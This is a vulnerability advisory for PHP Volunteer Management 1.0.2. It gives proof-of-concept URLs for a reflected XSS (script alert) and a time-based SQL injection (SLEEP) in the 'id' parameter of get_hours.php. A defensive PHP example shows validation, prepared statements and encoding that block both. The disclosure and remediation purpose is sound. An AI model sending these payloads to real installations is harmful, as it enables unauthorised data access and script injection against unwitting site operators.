PHP Volunteer Management 'id' 1.0.2 Multiple Vulnerabilities



# Exploit Title: PHP Volunteer Management 'id' 1.0.2 Multiple Vulnerabilities
# Date: 04/21/12
# Author: G13
# Twitter: @g13net
# Software Site: https://sourceforge.net/projects/phpvolunteer/
# Version: 1.0.2
# Category: webapp (php)
#

##### ToC #####

0x01 Description
0x02 XSS
0x03 SQL Injection
0x04 Vendor Notification

##### 0x01 Description #####

PHP Volunteer Management is volunteer-management software that keeps track
of volunteer hours worked and location assignments. The system is built on
PHP/MySQL.

##### 0x02 XSS #####

---------------Vulnerability-------------------

The 'id' parameter of the get_hours.php page is vulnerable to reflected XSS.
No authentication is needed.

----------Exploit-----------------------------------

http://localhost/mods/hours/data/get_hours.php?id=[XSS]&take=10&skip=0&page=1&pageSize=10

------------PoC---------------------------

http://localhost/mods/hours/data/get_hours.php?id=%27%22%3Cscript%3Ealert%281%29;%3C/script%3E&take=10&skip=0&page=1&pageSize=10

##### 0x03 SQL Injection #####

---------------Vulnerability-------------------

The 'id' parameter on the get_hours.php page is also vulnerable to SQL
Injection. No authentication is needed.

----------Exploit-----------------------------------

http://localhost/mods/hours/data/get_hours.php?id=[SQLi]&take=10&skip=0&page=1&pageSize=10

------------PoC---------------------------

http://localhost/mods/hours/data/get_hours.php?id=1%27%20AND%20SLEEP%285%29%20AND%20%27BDzu%27=%27BDzu&take=10&skip=0&page=1&pageSize=10
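Both findings above come from the same untrusted parameter: 'id' is reflected into the response unencoded and interpolated into the SQL text. The following is an added example written for this page, not code from the advisory or from the phpvolunteer project: a hypothetical hardened handler for an endpoint shaped like get_hours.php, showing the two controls that close both issues (strict input validation plus a parameterised query for the SQL injection, and output encoding for the XSS). The table name, column names, and the in-memory SQLite store are assumptions made for the demo; the project's real schema is not on the page.

```php
<?php
// Added example (not the project's code). Assumed schema: hours(volunteer_id, hours, location).
declare(strict_types=1);

// Control 1: accept only what the parameter can legitimately be (a positive integer).
// Anything else, including the quote/script/SLEEP payloads in the advisory, is rejected
// before it reaches the database or the response.
function validateId($raw): ?int
{
    if (!is_string($raw) || !preg_match('/^[1-9][0-9]{0,9}$/', $raw)) {
        return null;
    }
    return (int) $raw;
}

// Control 2: a prepared statement, so user input is sent as data and never
// becomes part of the SQL text, whatever it contains.
function getHours(PDO $db, int $id, int $take, int $skip): array
{
    $stmt = $db->prepare(
        'SELECT volunteer_id, hours, location FROM hours WHERE volunteer_id = :id LIMIT :take OFFSET :skip'
    );
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->bindValue(':take', $take, PDO::PARAM_INT);
    $stmt->bindValue(':skip', $skip, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Control 3: if a value is ever echoed back (error page, search box, etc.), encode it
// for the HTML context so it renders as text instead of markup.
function renderError(string $rawId): string
{
    return '<p>Invalid id: ' . htmlspecialchars($rawId, ENT_QUOTES | ENT_HTML5, 'UTF-8') . '</p>';
}

// --- Demo with constructed sample data in an in-memory SQLite database ---
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE hours (volunteer_id INTEGER, hours REAL, location TEXT)');
$db->exec("INSERT INTO hours VALUES (1, 4.5, 'Food bank'), (1, 2.0, 'Shelter'), (2, 3.0, 'Library')");

// A legitimate request followed by the two PoC values from the advisory, URL-decoded.
$requests = [
    '1',
    "1' AND SLEEP(5) AND 'BDzu'='BDzu",
    "'\"<script>alert(1);</script>",
];

foreach ($requests as $raw) {
    $id = validateId($raw);
    if ($id === null) {
        // Rejected input: no query is executed, and the echoed value is inert text.
        echo renderError($raw), "\n";
        continue;
    }
    // JSON_HEX_* flags keep <, >, &, ', " out of the JSON body in case a caller
    // ever inserts it into HTML without further encoding.
    $flags = JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT;
    echo json_encode(getHours($db, $id, 10, 0), $flags), "\n";
}
```

Run with `php example.php` (requires the pdo_sqlite extension). The first request returns the two rows for volunteer 1; the two PoC strings never reach the database and are printed back as encoded text, so neither the 5-second delay nor the script executes. Of the three controls, the prepared statement is the one that should not be optional: the integer whitelist is defence in depth for this parameter, but a page whose parameters are legitimately free text still needs parameterisation and context-specific output encoding.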

##### 0x04 Vendor Notification #####

4/21/12 - Vendor Notified
4/24/12 - Vendor responded, OK to disclose
